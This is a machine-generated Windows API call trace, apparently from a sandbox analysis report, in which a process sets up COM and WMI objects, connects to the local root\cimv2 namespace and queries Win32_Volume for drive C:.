	[0195.535] VirtualQuery (in: lpAddress=0x1c6eca60, lpBuffer=0x1c6ed920, dwLength=0x30 | out: lpBuffer=0x1c6ed920*(BaseAddress=0x1c6ec000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0195.567] CoGetObjectContext (in: riid=0x1c6ecd78*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd70 | out: ppv=0x1c6ecd70*=0x321868) returned 0x0
	[0195.567] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd90 | out: pAptType=0x1c6ecd90*=1) returned 0x0
	[0195.567] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece98 | out: ppvObject=0x1c6ece98*=0x0) returned 0x80004002
	[0195.567] IUnknown:Release (This=0x321868) returned 0x1
	[0195.570] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec400 | out: ppv=0x1c6ec400*=0x1cd117e0) returned 0x0
	[0195.570] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd117e0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec110 | out: ppvObject=0x1c6ec110*=0x0) returned 0x80004002
	[0195.571] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd117e0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0f8 | out: ppvObject=0x1c6ec0f8*=0x1cd14510) returned 0x0
	[0195.571] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd14510, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec000 | out: ppvObject=0x1c6ec000*=0x1cd14510) returned 0x0
	[0195.571] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd14510, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec080 | out: ppvObject=0x1c6ec080*=0x0) returned 0x80004002
	[0195.572] WbemDefPath:IUnknown:AddRef (This=0x1cd14510) returned 0x3
	[0195.572] CoGetContextToken (in: pToken=0x1c6ebcd0 | out: pToken=0x1c6ebcd0) returned 0x0
	[0195.572] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd14510, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc90 | out: ppvObject=0x1c6ebc90*=0x1b83a780) returned 0x0
	[0195.572] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b83a780, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebcc0 | out: pCid=0x1c6ebcc0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0195.572] WbemDefPath:IUnknown:Release (This=0x1b83a780) returned 0x3
	[0195.572] CoGetContextToken (in: pToken=0x1c6ebca0 | out: pToken=0x1c6ebca0) returned 0x0
	[0195.573] WbemDefPath:IUnknown:AddRef (This=0x1cd14510) returned 0x4
	[0195.573] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd14510, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebdb8 | out: ppvObject=0x1c6ebdb8*=0x0) returned 0x80004002
	[0195.573] WbemDefPath:IUnknown:Release (This=0x1cd14510) returned 0x3
	[0195.573] WbemDefPath:IUnknown:Release (This=0x1cd14510) returned 0x2
	[0195.573] WbemDefPath:IUnknown:Release (This=0x1cd117e0) returned 0x0
	[0195.573] WbemDefPath:IUnknown:Release (This=0x1cd14510) returned 0x1
	[0195.574] CoGetContextToken (in: pToken=0x1c6ec9d0 | out: pToken=0x1c6ec9d0) returned 0x0
	[0195.574] CoGetContextToken (in: pToken=0x1c6ec910 | out: pToken=0x1c6ec910) returned 0x0
	[0195.574] WbemDefPath:IUnknown:AddRef (This=0x1cd14510) returned 0x2
	[0195.574] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd14510, riid=0x1c6eca50*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6eca30 | out: ppvObject=0x1c6eca30*=0x1cd14510) returned 0x0
	[0195.574] WbemDefPath:IUnknown:Release (This=0x1cd14510) returned 0x2
	[0195.575] WbemDefPath:IUnknown:Release (This=0x1cd14510) returned 0x1
	[0195.575] CoGetContextToken (in: pToken=0x1c6ecb50 | out: pToken=0x1c6ecb50) returned 0x0
	[0195.575] CoGetContextToken (in: pToken=0x1c6eca90 | out: pToken=0x1c6eca90) returned 0x0
	[0195.575] WbemDefPath:IUnknown:AddRef (This=0x1cd14510) returned 0x2
	[0195.575] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd14510, riid=0x1c6ecbd0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecbb0 | out: ppvObject=0x1c6ecbb0*=0x1cd14510) returned 0x0
	[0195.575] WbemDefPath:IUnknown:Release (This=0x1cd14510) returned 0x2
	[0195.575] WbemDefPath:IUnknown:AddRef (This=0x1cd14510) returned 0x3
	[0195.576] WbemDefPath:IWbemPath:SetText (This=0x1cd14510, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0195.576] WbemDefPath:IUnknown:Release (This=0x1cd14510) returned 0x2
	[0195.576] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd14510, puCount=0x1c6ece60 | out: puCount=0x1c6ece60*=0x2) returned 0x0
	[0195.576] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ece60*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece60*=0x17, pszText=0x0) returned 0x0
	[0195.576] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ece60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0195.576] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd14510, puCount=0x1c6ece10 | out: puCount=0x1c6ece10*=0x2) returned 0x0
	[0195.576] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ece10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ece10*=0x17, pszText=0x0) returned 0x0
	[0195.576] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=4, puBuffLength=0x1c6ece10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ece10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0195.576] CoGetObjectContext (in: riid=0x1c6ecd48*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd40 | out: ppv=0x1c6ecd40*=0x321868) returned 0x0
	[0195.577] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd60 | out: pAptType=0x1c6ecd60*=1) returned 0x0
	[0195.577] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece68 | out: ppvObject=0x1c6ece68*=0x0) returned 0x80004002
	[0195.577] IUnknown:Release (This=0x321868) returned 0x1
	[0195.577] CoGetClassObject (in: rclsid=0x1b82a6d8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec9f0 | out: ppv=0x1c6ec9f0*=0x1cd11880) returned 0x0
	[0195.577] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd11880, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec700 | out: ppvObject=0x1c6ec700*=0x0) returned 0x80004002
	[0195.578] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cd11880, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec6e8 | out: ppvObject=0x1c6ec6e8*=0x1cd118a0) returned 0x0
	[0195.804] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd118a0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5f0 | out: ppvObject=0x1c6ec5f0*=0x1cd118a0) returned 0x0
	[0195.804] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd118a0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec670 | out: ppvObject=0x1c6ec670*=0x0) returned 0x80004002
	[0195.805] WbemLocator:IUnknown:AddRef (This=0x1cd118a0) returned 0x3
	[0195.805] CoGetContextToken (in: pToken=0x1c6ec2c0 | out: pToken=0x1c6ec2c0) returned 0x0
	[0195.805] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd118a0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec280 | out: ppvObject=0x1c6ec280*=0x0) returned 0x80004002
	[0195.806] CoGetContextToken (in: pToken=0x1c6ec290 | out: pToken=0x1c6ec290) returned 0x0
	[0195.806] WbemLocator:IUnknown:AddRef (This=0x1cd118a0) returned 0x4
	[0195.806] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd118a0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec3a8 | out: ppvObject=0x1c6ec3a8*=0x0) returned 0x80004002
	[0195.806] WbemLocator:IUnknown:Release (This=0x1cd118a0) returned 0x3
	[0195.806] WbemLocator:IUnknown:Release (This=0x1cd118a0) returned 0x2
	[0195.806] WbemLocator:IUnknown:Release (This=0x1cd11880) returned 0x0
	[0195.806] WbemLocator:IUnknown:Release (This=0x1cd118a0) returned 0x1
	[0195.806] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0195.806] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0195.806] WbemLocator:IUnknown:AddRef (This=0x1cd118a0) returned 0x2
	[0195.807] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd118a0, riid=0x1c6ec930*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec910 | out: ppvObject=0x1c6ec910*=0x1cd118a0) returned 0x0
	[0195.807] WbemLocator:IUnknown:Release (This=0x1cd118a0) returned 0x2
	[0195.807] WbemLocator:IUnknown:Release (This=0x1cd118a0) returned 0x1
	[0195.807] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd14510, puCount=0x1c6ecd10 | out: puCount=0x1c6ecd10*=0x2) returned 0x0
	[0195.807] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=8, puBuffLength=0x1c6ecd10*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd10*=0x17, pszText=0x0) returned 0x0
	[0195.807] WbemDefPath:IWbemPath:GetText (in: This=0x1cd14510, lFlags=8, puBuffLength=0x1c6ecd10*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd10*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0195.807] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c6eca00 | out: ppv=0x1c6eca00*=0x1cd118c0) returned 0x0
	[0195.807] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cd118c0, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c6ecc90 | out: ppNamespace=0x1c6ecc90*=0x1cd14808) returned 0x0
	[0196.102] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd14808, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec878 | out: ppvObject=0x1c6ec878*=0x1b825f20) returned 0x0
	[0196.102] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b825f20, pProxy=0x1cd14808, pAuthnSvc=0x1c6ec870, pAuthzSvc=0x1c6ec86c, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868, pImpLevel=0x1c6ec884, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880 | out: pAuthnSvc=0x1c6ec870*=0xa, pAuthzSvc=0x1c6ec86c*=0x0, pServerPrincName=0x1c6ec898, pAuthnLevel=0x1c6ec868*=0x6, pImpLevel=0x1c6ec884*=0x2, pAuthInfo=0x1c6ec8a8, pCapabilites=0x1c6ec880*=0x1) returned 0x0
	[0196.102] WbemLocator:IUnknown:Release (This=0x1b825f20) returned 0x1
	[0196.102] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd14808, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec818 | out: ppvObject=0x1c6ec818*=0x1b825f60) returned 0x0
	[0196.102] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd14808, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec7a8 | out: ppvObject=0x1c6ec7a8*=0x1b825f20) returned 0x0
	[0196.102] WbemLocator:IClientSecurity:SetBlanket (This=0x1b825f20, pProxy=0x1cd14808, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0196.103] WbemLocator:IUnknown:Release (This=0x1b825f20) returned 0x2
	[0196.103] WbemLocator:IUnknown:Release (This=0x1b825f60) returned 0x1
	[0196.103] CoTaskMemFree (pv=0x1b839620) 
	[0196.103] WbemLocator:IUnknown:Release (This=0x1cd118c0) returned 0x0
	[0196.103] WbemLocator:IUnknown:QueryInterface (in: This=0x1cd14808, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec490 | out: ppvObject=0x1c6ec490*=0x1b825f60) returned 0x0
	[0196.103] WbemLocator:IUnknown:QueryInterface (in: This=0x1b825f60, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec510 | out: ppvObject=0x1c6ec510*=0x0) returned 0x80004002
	[0196.150] WbemLocator:IUnknown:QueryInterface (in: This=0x1b825f60, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec2a8 | out: ppvObject=0x1c6ec2a8*=0x0) returned 0x80004002
	[0196.153] WbemLocator:IUnknown:AddRef (This=0x1b825f60) returned 0x3
	[0196.153] CoGetContextToken (in: pToken=0x1c6ec160 | out: pToken=0x1c6ec160) returned 0x0
	[0196.153] WbemLocator:IUnknown:QueryInterface (in: This=0x1b825f60, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec120 | out: ppvObject=0x1c6ec120*=0x1b825e48) returned 0x0
	[0196.153] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b825e48, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec150 | out: pCid=0x1c6ec150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0196.153] WbemLocator:IUnknown:Release (This=0x1b825e48) returned 0x3
	[0196.153] CoGetContextToken (in: pToken=0x1c6ec130 | out: pToken=0x1c6ec130) returned 0x0
	[0196.153] WbemLocator:IUnknown:AddRef (This=0x1b825f60) returned 0x4
	[0196.153] WbemLocator:IUnknown:QueryInterface (in: This=0x1b825f60, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec248 | out: ppvObject=0x1c6ec248*=0x1b825f30) returned 0x0
	[0196.154] WbemLocator:IUnknown:Release (This=0x1b825f60) returned 0x4
	[0196.154] WbemLocator:IRpcOptions:Query (in: This=0x1b825f30, pPrx=0x1b825f60, dwProperty=2, pdwValue=0x1c6ec2b8 | out: pdwValue=0x1c6ec2b8) returned 0x80004002
	[0196.154] WbemLocator:IUnknown:Release (This=0x1b825f30) returned 0x3
	[0196.154] WbemLocator:IUnknown:Release (This=0x1b825f60) returned 0x2
	[0196.154] CoGetContextToken (in: pToken=0x1c6ec630 | out: pToken=0x1c6ec630) returned 0x0
	[0196.154] CoGetContextToken (in: pToken=0x1c6ec570 | out: pToken=0x1c6ec570) returned 0x0
	[0196.154] WbemLocator:IUnknown:AddRef (This=0x1b825f60) returned 0x3
	[0196.154] WbemLocator:IUnknown:QueryInterface (in: This=0x1b825f60, riid=0x1c6ec6b0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec690 | out: ppvObject=0x1c6ec690*=0x1cd14808) returned 0x0
	[0196.154] WbemLocator:IUnknown:Release (This=0x1b825f60) returned 0x3
	[0196.155] WbemLocator:IUnknown:Release (This=0x1cd14808) returned 0x2
	[0196.155] WbemLocator:IUnknown:Release (This=0x1cd14808) returned 0x1
	[0196.155] CoGetContextToken (in: pToken=0x1c6ecc30 | out: pToken=0x1c6ecc30) returned 0x0
	[0196.155] WbemLocator:IUnknown:AddRef (This=0x1b825f60) returned 0x2
	[0196.155] WbemLocator:IUnknown:QueryInterface (in: This=0x1b825f60, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec800 | out: ppvObject=0x1c6ec800*=0x1b825f60) returned 0x0
	[0196.155] WbemLocator:IUnknown:Release (This=0x1b825f60) returned 0x2
	[0196.155] WbemLocator:IUnknown:Release (This=0x1b825f60) returned 0x1
	[0196.156] CoGetContextToken (in: pToken=0x1c6ec8d0 | out: pToken=0x1c6ec8d0) returned 0x0
	[0196.156] CoGetContextToken (in: pToken=0x1c6ec810 | out: pToken=0x1c6ec810) returned 0x0
	[0196.156] WbemLocator:IUnknown:AddRef (This=0x1b825f60) returned 0x2
	[0196.156] WbemLocator:IUnknown:QueryInterface (in: This=0x1b825f60, riid=0x1c6ec950*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec930 | out: ppvObject=0x1c6ec930*=0x1cd14808) returned 0x0
	[0196.156] WbemLocator:IUnknown:Release (This=0x1b825f60) returned 0x2
	[0196.156] WbemLocator:IUnknown:AddRef (This=0x1cd14808) returned 0x3
	[0196.156] IWbemServices:ExecQuery (in: This=0x1cd14808, strQueryLanguage="WQL", strQuery="select * from Win32_Volume where Name='C:\\\\'", lFlags=16, pCtx=0x0, ppEnum=0x1c6ecdc8 | out: ppEnum=0x1c6ecdc8*=0x1cd181d8) returned 0x0
	[0196.164] IUnknown:QueryInterface (in: This=0x1cd181d8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9d8 | out: ppvObject=0x1c6ec9d8*=0x1cd181e0) returned 0x0
	[0196.164] IClientSecurity:QueryBlanket (in: This=0x1cd181e0, pProxy=0x1cd181d8, pAuthnSvc=0x1c6ec9d0, pAuthzSvc=0x1c6ec9cc, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8, pImpLevel=0x1c6ec9e4, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0 | out: pAuthnSvc=0x1c6ec9d0*=0xa, pAuthzSvc=0x1c6ec9cc*=0x0, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8*=0x6, pImpLevel=0x1c6ec9e4*=0x2, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0*=0x1) returned 0x0
	[0196.164] IUnknown:Release (This=0x1cd181e0) returned 0x1
	[0196.164] IUnknown:QueryInterface (in: This=0x1cd181d8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec978 | out: ppvObject=0x1c6ec978*=0x1b842860) returned 0x0
	[0196.165] IUnknown:QueryInterface (in: This=0x1cd181d8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec908 | out: ppvObject=0x1c6ec908*=0x1cd181e0) returned 0x0
	[0196.165] IClientSecurity:SetBlanket (This=0x1cd181e0, pProxy=0x1cd181d8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0196.170] IUnknown:Release (This=0x1cd181e0) returned 0x2
	[0196.170] WbemLocator:IUnknown:Release (This=0x1b842860) returned 0x1
	[0196.170] CoTaskMemFree (pv=0x1b839680) 
	[0196.171] IUnknown:QueryInterface (in: This=0x1cd181d8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5b0 | out: ppvObject=0x1c6ec5b0*=0x1b842860) returned 0x0
	[0196.171] WbemLocator:IUnknown:QueryInterface (in: This=0x1b842860, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec630 | out: ppvObject=0x1c6ec630*=0x0) returned 0x80004002
	[0196.174] WbemLocator:IUnknown:QueryInterface (in: This=0x1b842860, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec3c8 | out: ppvObject=0x1c6ec3c8*=0x0) returned 0x80004002
	[0196.203] WbemLocator:IUnknown:AddRef (This=0x1b842860) returned 0x3
	[0196.203] CoGetContextToken (in: pToken=0x1c6ec280 | out: pToken=0x1c6ec280) returned 0x0
	[0196.203] WbemLocator:IUnknown:QueryInterface (in: This=0x1b842860, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec240 | out: ppvObject=0x1c6ec240*=0x1b842748) returned 0x0
